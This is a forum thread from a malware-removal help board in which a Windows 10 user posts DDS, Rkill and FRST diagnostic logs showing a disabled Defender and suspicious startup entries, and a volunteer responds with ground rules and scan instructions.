
Unable to enable WinDefender On and open Settings and other


  • This topic is locked
6 replies to this topic

#1 D3AtH


Posted 08 June 2018 - 02:46 PM

Hello all, I am using Windows 10 and I have encountered a problem. I am unable to enable Windows Defender and cannot open Settings, the Search bar, the Start menu or the Action Center, and I don't know why. I have tried many methods to solve this problem but I had no luck at all. On top of all that, I even tried the sfc scan and can't run it even as an administrator; it says "Access is denied." I ran DISM scans as well and it still didn't work. I tried RKill and it didn't do a thing.
I ran a DDS scan; here is what I got in the logs:
 
2018-04-10 21:10:00 5739008 ----a-w- C:\Windows\System32\prm0009.dll
2018-04-10 21:10:00 2560 ----a-w- C:\Windows\SysWow64\SyncRes.dll
2018-04-10 21:10:00 148480 ----a-w- C:\Windows\SysWow64\MCCSEngineShared.dll
2018-04-10 21:10:00 117760 ----a-w- C:\Windows\SysWow64\networkhelper.dll
2018-04-10 21:09:00 520704 ----a-w- C:\Windows\SysWow64\SyncController.dll
2018-04-10 21:09:00 2629120 ----a-w- C:\Windows\System32\NlsLexicons0009.dll
2018-04-10 21:09:00 214016 ----a-w- C:\Windows\SysWow64\accountaccessor.dll
2018-04-10 21:09:00 20480 ----a-w- C:\Windows\System32\MCCSPal.dll
2018-04-10 21:08:00 93184 ----a-w- C:\Windows\System32\InternetMailCsp.dll
2018-04-10 21:08:00 70656 ----a-w- C:\Windows\System32\APHostClient.dll
2018-04-10 21:08:00 61952 ----a-w- C:\Windows\System32\SyncProxy.dll
2018-04-10 21:08:00 57856 ----a-w- C:\Windows\System32\InprocLogger.dll
2018-04-10 21:08:00 327680 ----a-w- C:\Windows\SysWow64\syncutil.dll
2018-04-10 21:08:00 2560 ----a-w- C:\Windows\System32\SyncRes.dll
2018-04-10 21:08:00 16384 ----a-w- C:\Windows\System32\APHostRes.dll
2018-04-10 21:07:00 99328 ----a-w- C:\Windows\System32\ActiveSyncCsp.dll
2018-04-10 21:07:00 62976 ----a-w- C:\Windows\System32\EASPolicyManagerBrokerHost.exe
2018-04-10 21:07:00 361984 ----a-w- C:\Windows\SysWow64\AccountsRt.dll
2018-04-10 21:07:00 346112 ----a-w- C:\Windows\SysWow64\DavSyncProvider.dll
2018-04-10 21:07:00 176128 ----a-w- C:\Windows\System32\MCCSEngineShared.dll
2018-04-10 21:07:00 13824 ----a-w- C:\Windows\System32\EasPolicyManagerBrokerPS.dll
2018-04-10 21:06:00 731648 ----a-w- C:\Windows\System32\internetmail.dll
2018-04-10 21:06:00 5487616 ----a-w- C:\Windows\SysWow64\NlsData0009.dll
2018-04-10 21:06:00 391168 ----a-w- C:\Windows\System32\syncutil.dll
2018-04-10 21:06:00 267776 ----a-w- C:\Windows\System32\accountaccessor.dll
2018-04-10 21:06:00 1537024 ----a-w- C:\Windows\SysWow64\ActiveSyncProvider.dll
2018-04-10 21:06:00 137728 ----a-w- C:\Windows\System32\networkhelper.dll
2018-04-10 21:05:00 619520 ----a-w- C:\Windows\System32\SyncController.dll
2018-04-10 21:05:00 403456 ----a-w- C:\Windows\System32\DavSyncProvider.dll
2018-04-10 21:05:00 324608 ----a-w- C:\Windows\System32\APHostService.dll
2018-04-10 21:04:00 434176 ----a-w- C:\Windows\System32\AccountsRt.dll
2018-04-10 21:02:00 6350848 ----a-w- C:\Windows\System32\NlsData0009.dll
2018-04-10 21:02:00 1773056 ----a-w- C:\Windows\System32\ActiveSyncProvider.dll
2018-03-28 17:03:44 126856 ----a-w- C:\Windows\System32\drivers\gtkrnl.sys
2017-11-15 15:06:59 7649280 ----a-w- C:\Program Files (x86)\GUTA61F.tmp
.
============= FINISH: 22:08:31.91 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 10 Pro
Boot Device: \Device\HarddiskVolume1
Install Date: 5/24/2018 1:18:45 AM
System Uptime: 6/8/2018 10:44:08 AM (12 hours ago)
.
Motherboard: Type2 - Board Vendor Name1 |  | Type2 - Board Product Name1
Processor: Intel® Pentium® CPU B960 @ 2.20GHz | U3E1 | 2200/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 97 GiB total, 41.542 GiB free.
D: is FIXED (NTFS) - 200 GiB total, 104.307 GiB free.
F: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
No restore point in system.
.
==== Hosts File Hijack ======================
.
.
==== Installed Programs ======================
.
µTorrent
Adobe Creative Cloud
Adobe Photoshop CC 2017
AP Tuner 3.08
BS.Player FREE
CloudNet
Counter Strike 1.6 Warzone
DAEMON Tools Pro
Google Chrome
Google Update Helper
Intel® C++ Redistributables on Intel® 64
Java 8 Update 161
Lightshot-5.4.0.35
Malwarebytes version 3.5.1.2522
Microsoft OneDrive
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.7523
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810
Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810
Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.12.25810
Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
Microsoft Visual Studio 2017
NVIDIA PhysX
Realtek Card Reader
Realtek High Definition Audio Driver
RevServicesX
SafeFinder
Steam
SUPERAntiSpyware
Synaptics Pointing Device Driver
System Healer
System Table
vs_filehandler_x86
WhatsApp
Windows 10 Update Assistant
WinRAR 5.40 (64-bit)
.
==== Event Viewer Messages From Past Week ========
.
6/8/2018 9:46:32 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 9:42:34 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.ShellExperienceHost_10.0.17134.1_neutral_neutral_cw5n1h2txyewy!App as Unavailable/Unavailable. The error: "2" Happened while starting this command: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
6/8/2018 9:37:10 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {8BC3F05E-D86B-11D0-A075-00C04FB68820}  and APPID  {8BC3F05E-D86B-11D0-A075-00C04FB68820}  to the user ALEX-PC\Craciun SID (S-1-5-21-3764278317-3264620232-1554668131-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.Windows.ContentDeliveryManager_10.0.17134.1_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-350187224-1905355452-1037786396-3028148496-2624191407-3283318427-1255436723). This security permission can be modified using the Component Services administrative tool.
6/8/2018 9:14:07 AM, Error: Service Control Manager [7034]  - The Windows Installer service terminated unexpectedly.  It has done this 1 time(s).
6/8/2018 3:42:29 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI as Unavailable/Unavailable. The error: "2" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/8/2018 3:41:23 PM, Error: Service Control Manager [7000]  - The Disc Soft Pro Bus Service service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 3:41:23 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "2" attempting to start the service Disc Soft Pro Bus Service with arguments "Unavailable" in order to run the server: {E9526F9B-B449-4171-810F-E710946CA1FA}
6/8/2018 3:39:49 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 3:39:49 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}  and APPID  {4839DDB7-58C2-48F5-8283-E1D1807D0D7D}  to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 11:00:40 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe!microsoft.windowslive.calendar.AppXwkn9j84yh1kvnt49k5r8h6y1ecsv09hs.mca as Unavailable/Unavailable. The error: "298" Happened while starting this command: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe\HxTsr.exe" -ServerName:Hx.IPC.Server
6/8/2018 11:00:00 AM, Error: Service Control Manager [7031]  - The Windows Installer service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
6/8/2018 10:48:14 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.ShellExperienceHost_10.0.17134.1_neutral_neutral_cw5n1h2txyewy!App as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
6/8/2018 10:47:47 AM, Error: Service Control Manager [7034]  - The saiyi technology limit service terminated unexpectedly.  It has done this 1 time(s).
6/8/2018 10:47:43 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/8/2018 10:47:02 AM, Error: Service Control Manager [7000]  - The Google Update Service (gupdate) service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:46:50 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
6/8/2018 10:44:54 AM, Error: Service Control Manager [7000]  - The Subair service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:44:54 AM, Error: Service Control Manager [7000]  - The Nettrans service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:44:54 AM, Error: Service Control Manager [7000]  - The MBAMService service failed to start due to the following error:  Access is denied.
6/8/2018 10:44:53 AM, Error: Service Control Manager [7000]  - The backlh service failed to start due to the following error:  The system cannot find the file specified.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The WlanSvc service depends on the Wcmsvc service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The WinHttpAutoProxySvc service depends on the Dhcp service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The Wcmsvc service depends on the nsi service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The nsi service depends on the nsiproxy service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The NlaSvc service depends on the Dhcp service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The mrxsmb20 service depends on the mrxsmb service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The mrxsmb service depends on the rdbss service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The LanmanWorkstation service depends on the nsi service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The iphlpsvc service depends on the WinHttpAutoProxySvc service which failed to start because of the following error:  The dependency service or group failed to start.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The Dnscache service depends on the tdx service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:39:05 AM, Error: Service Control Manager [7001]  - The Dhcp service depends on the AFD service which failed to start because of the following error:  A device attached to the system is not functioning.
6/8/2018 10:31:27 AM, Error: Microsoft-Windows-DistributedCOM [10016]  - The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID  {C2F03A33-21F5-47FA-B4BB-156362A2F239}  and APPID  {316CDED5-E4AE-4B15-9113-7055D84DCC97}  to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
6/8/2018 10:00:58 PM, Error: Service Control Manager [7000]  - The Windows Defender Antivirus Service service failed to start due to the following error:  Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
6/7/2018 8:37:40 PM, Error: Service Control Manager [7034]  - The Windows Installer service terminated unexpectedly.  It has done this 3 time(s).
6/7/2018 8:28:57 PM, Error: Service Control Manager [7031]  - The Windows Installer service terminated unexpectedly.  It has done this 2 time(s).  The following corrective action will be taken in 300000 milliseconds: Restart the service.
6/7/2018 8:17:06 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca as Unavailable/Unavailable. The error: "5" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/7/2018 8:05:51 AM, Error: Microsoft-Windows-HAL [13]  - The system watchdog timer was triggered.
6/7/2018 7:50:19 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca as Unavailable/Unavailable. The error: "2" Happened while starting this command: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
6/6/2018 8:11:43 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe!microsoft.windowslive.calendar.AppXwkn9j84yh1kvnt49k5r8h6y1ecsv09hs.mca as Unavailable/Unavailable. The error: "0" Happened while starting this command: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe\HxTsr.exe" -ServerName:Hx.IPC.Server
6/6/2018 8:01:50 PM, Error: Service Control Manager [7046]  - The following service has repeatedly stopped responding to service control requests: Connected User Experiences and Telemetry Contact the service vendor or the system administrator about whether to disable this service until the problem is identified. You may have to restart the computer in safe mode before you can disable the service.
6/6/2018 8:01:20 PM, Error: Service Control Manager [7011]  - A timeout (30000 milliseconds) was reached while waiting for a transaction response from the DiagTrack service.
6/5/2018 7:33:27 PM, Error: Service Control Manager [7031]  - The Windows Installer service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 300000 milliseconds: Restart the service.
6/5/2018 3:22:14 AM, Error: Service Control Manager [7000]  - The Microsoft Account Sign-in Assistant service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
6/5/2018 3:22:14 AM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1053" attempting to start the service WaaSMedicSvc with arguments "Unavailable" in order to run the server: {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32}
6/5/2018 3:22:11 AM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Microsoft Account Sign-in Assistant service to connect.
6/5/2018 3:22:10 AM, Error: Service Control Manager [7000]  - The Windows Update Medic Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
6/5/2018 3:22:08 AM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Windows Update Medic Service service to connect.
6/5/2018 3:21:51 AM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.People_10.3.10452.0_x64__8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppXv1pa150fssxfwf8qn0j65z3gp1qhwkcs.mca as Unavailable/Unavailable. The error: "0" Happened while starting this command: "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca
6/5/2018 10:14:15 AM, Error: Service Control Manager [7022]  - The Update Orchestrator Service service hung on starting.
6/5/2018 10:06:06 AM, Error: Service Control Manager [7038]  - The msiserver service was unable to log on as NT AUTHORITY\SYSTEM with the currently configured password due to the following error:  The request is not supported. To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
6/5/2018 10:06:06 AM, Error: Service Control Manager [7000]  - The Windows Installer service failed to start due to the following error:  The service did not start due to a logon failure.
6/4/2018 11:07:01 PM, Error: Microsoft-Windows-DistributedCOM [10001]  - Unable to start a DCOM Server: Microsoft.Windows.Photos_2018.18031.15820.0_x64__8wekyb3d8bbwe!App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca as Unavailable/Unavailable. The error: "0" Happened while starting this command: "C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18031.15820.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
6/3/2018 8:43:00 AM, Error: Service Control Manager [7032]  - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Installer service, but this action failed with the following error:  An instance of the service is already running.
.
==== End Of File ===========================
 
Oh, and this is what Rkill did: 

Rkill 2.9.1 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2018 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html
 
Program started at: 06/08/2018 09:44:23 PM in x64 mode.
Windows Version: Windows 10 Pro 
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * No malware processes found to kill.
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * HOSTS file entries found: 
 
 
  20 out of 257 HOSTS entries shown.
  Please review HOSTS file for further entries.
 
Program finished at: 06/08/2018 09:45:39 PM
Execution time: 0 hours(s), 1 minute(s), and 15 seconds(s)

Please, I have no idea what I should do. I don't understand all these letters and numbers.

Edited by Al1000, 10 June 2018 - 10:51 AM.
moved from Win 10 Support




#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,372 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:43 AM

Posted 10 June 2018 - 05:53 PM

Greetings D3AtH and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this. If necessary, download the below program onto a USB device from a clean computer and transfer it over to the infected computer.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Download Farbar Recovery Scan Tool for either 32 bit or 64 bit systems and save it to your Desktop. <<< Important
  • Right click on the icon and select Run as administrator
  • Click Yes to the disclaimer
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of each report in separate reply windows
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • FRST results
  • Addition log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#3 D3AtH

D3AtH
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  

Posted 11 June 2018 - 01:22 PM

You can call me Alex, and I would very much like to follow your steps in fixing my computer, because like you said you are experts and I don't want to make it worse.

Here is what you asked for:

FRST log:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01

Ran by Craciun (administrator) on ALEX-PC (11-06-2018 20:39:18)
Running from C:\Users\Craciun\Desktop
Loaded Profiles: Craciun (Available Profiles: Craciun)
Platform: Windows 10 Pro Version 1803 17134.48 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Microsoft Corporation) C:\Windows\System32\certutil.exe
Failed to access process -> chrome.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
() C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
() C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\T9XH.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
() C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.9226.21705.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SecurityHealth] => %ProgramFiles%\Windows Defender\MSASCuiL.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16781824 2017-05-10] (Realtek Semiconductor)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems, Incorporated)
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
HKLM\...\Run: [rundll32] => C:\Windows\system32\rundll32.exe "C:\Program Files\Sawmenger XP\Sawmenger XP.dll",elnXHi
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Creative Cloud] => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [225944 2017-04-11] ()
HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Synaptics\PS1O1Z7IEGLDHYG\RJFnT9NCyn.exe [241664 2018-05-24] ()
HKLM\...\RunOnce: [yw1ci4cwik4] => C:\Program Files (x86)\trs\3084091.exe [670208 2018-05-23] ()
